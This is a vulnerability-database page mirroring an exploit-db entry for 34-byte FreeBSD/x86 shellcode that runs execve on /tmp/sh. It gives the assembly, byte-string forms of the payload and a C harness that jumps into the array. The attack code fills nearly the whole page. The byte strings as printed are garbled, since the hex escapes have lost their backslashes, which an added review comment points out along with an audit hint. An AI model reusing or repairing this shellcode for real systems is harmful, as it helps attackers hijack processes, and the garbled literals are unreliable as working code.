FreeBSD/x86 – execve(/tmp/sh) Shellcode (34 bytes)


漏洞ID 1054672 漏洞类型
发布时间 2004-09-26 更新时间 2004-09-26
CVE编号 N/A
CNNVD-ID N/A
漏洞平台 FreeBSD_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13277
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
 * FreeBSD shellcode - execve /tmp/sh
 * 
 * Claes M. Nyberg 20020120
 *
 * <[email protected]>, <[email protected]>
 */

/**********************************************************
void
main()
{
__asm__("
        xorl    %eax, %eax   # eax = 0
        pushl   %eax         # string ends with NULL
        pushl   $0x68732f2f  # push 'hs//' (//sh)
        pushl   $0x706d742f  # push 'pmt/' (/tmp)
        movl    %esp, %ebx   # ebx = argv[0] = string addr
        pushl   %eax         # argv[1] = NULL
        pushl   %ebx         # argv[0] = /tmp//sh
        movl    %esp, %edx   # edx = &argv[0]
        
        pushl   %eax         # envp = NULL
        pushl   %edx         # &argv[0]
        pushl   %ebx         # *path = argv[0]
        pushl   %eax         # Dummy
        movb    $0x3b, %al   # al = 59 = execve
        int     $0x80        # execve(argv[0], argv, NULL)

        xorl    %eax, %eax   # eax = 0
        inc     %eax         # eax++
        pushl   %eax         # Exit value = 1
        pushl   %eax         # Dummy
        int     $0x80        # exit(1); (eax is 1 = exit)
    ");
}
************************************************************/

#include <stdio.h>
#include <string.h>

/*
 * Annotated form of the payload: one string fragment per instruction, with
 * the matching AT&T-syntax instruction in the trailing comment.
 *
 * What the instruction comments describe:
 *   - a zero dword followed by the two immediates 0x68732f2f and 0x706d742f
 *     is pushed, leaving the NUL-terminated path "/tmp//sh" on the stack;
 *   - a two-entry argv { path, NULL } is built on the stack and envp is NULL;
 *   - al is set to 0x3b and int $0x80 is issued, i.e. execve(path, argv, NULL);
 *   - if that returns, a second int $0x80 is issued with eax = 1 and a
 *     pushed value of 1, i.e. exit(1).
 *
 * NOTE(review): as printed on this page the backslashes of the hex escapes
 * are missing ("x31xc0" rather than an escaped byte pair), so this literal
 * holds plain ASCII text, three characters per intended byte, and not the
 * 34 bytes of machine code named in the page title.
 *
 * For triage: the program that gets started is whatever file sits at
 * /tmp/sh, so an execve of that path by a process that has no reason to
 * spawn a shell is the observable event to look for in audit data.
 */
static char freebsd_code[] =
    "x31xc0"               /* xorl    %eax, %eax  */
    "x50"                   /* pushl   %eax        */
    "x68x2fx2fx73x68"   /* pushl   $0x68732f2f */
    "x68x2fx74x6dx70"   /* pushl   $0x706d742f */
    "x89xe3"               /* movl    %esp, %ebx  */
    "x50"                   /* pushl   %eax        */
    "x53"                   /* pushl   %ebx        */
    "x89xe2"               /* movl    %esp, %edx  */
    "x50"                   /* pushl   %eax        */     
    "x52"                   /* pushl   %edx        */    
    "x53"                   /* pushl   %ebx        */
    "x50"                   /* pushl   %eax        */
    "xb0x3b"               /* movb    $0x3b, %al  */
    "xcdx80"               /* int     $0x80       */
    "x31xc0"               /* xorl    %eax, %eax  */
    "x40"                   /* inc     %eax        */ 
    "x50"                   /* pushl   %eax        */
    "x50"                   /* pushl   %eax        */
    "xcdx80";              /* int     $0x80       */


/*
 * The same byte sequence as freebsd_code, packed eight values per line
 * without the per-instruction comments. Nothing in this file references
 * this copy; main() uses freebsd_code.
 *
 * NOTE(review): the hex escapes have lost their backslashes here as well,
 * so as printed this is ASCII text rather than the intended bytes.
 * NOTE(review): a file-scope identifier that begins with an underscore is
 * reserved for the implementation in ISO C.
 */
static char _freebsd_code[] =
    "x31xc0x50x68x2fx2fx73x68"
    "x68x2fx74x6dx70x89xe3x50"
    "x53x89xe2x50x52x53x50xb0"
    "x3bxcdx80x31xc0x40x50x50"
    "xcdx80";

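/*
 * Test harness: prints the length of freebsd_code, then calls the array as
 * if it were a function.
 *
 * - strlen() stops at the first NUL byte, so the printed figure equals the
 *   payload size only because the payload is written without embedded NULs.
 *   strlen() returns size_t, hence %zu; the newline escape, which the page
 *   shows as a bare 'n', is written as \n.
 * - Converting a pointer to a data object into a function pointer and
 *   calling it is not defined by ISO C. The call can only succeed where the
 *   memory holding the static array is executable; with non-executable data
 *   pages (NX / W^X) the process faults at the call instead.
 * - According to the instruction comments on freebsd_code, a successful
 *   execve replaces the process image and a failed one ends in exit(1), so
 *   the return below is not expected to be reached.
 *
 * Returns 0 if the call ever comes back.
 */
int
main(void)
{
	void (*code)(void) = (void (*)(void))freebsd_code;

	printf("strlen code: %zu\n", strlen(freebsd_code));
	code();
	return 0;
}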

// milw0rm.com [2004-09-26]
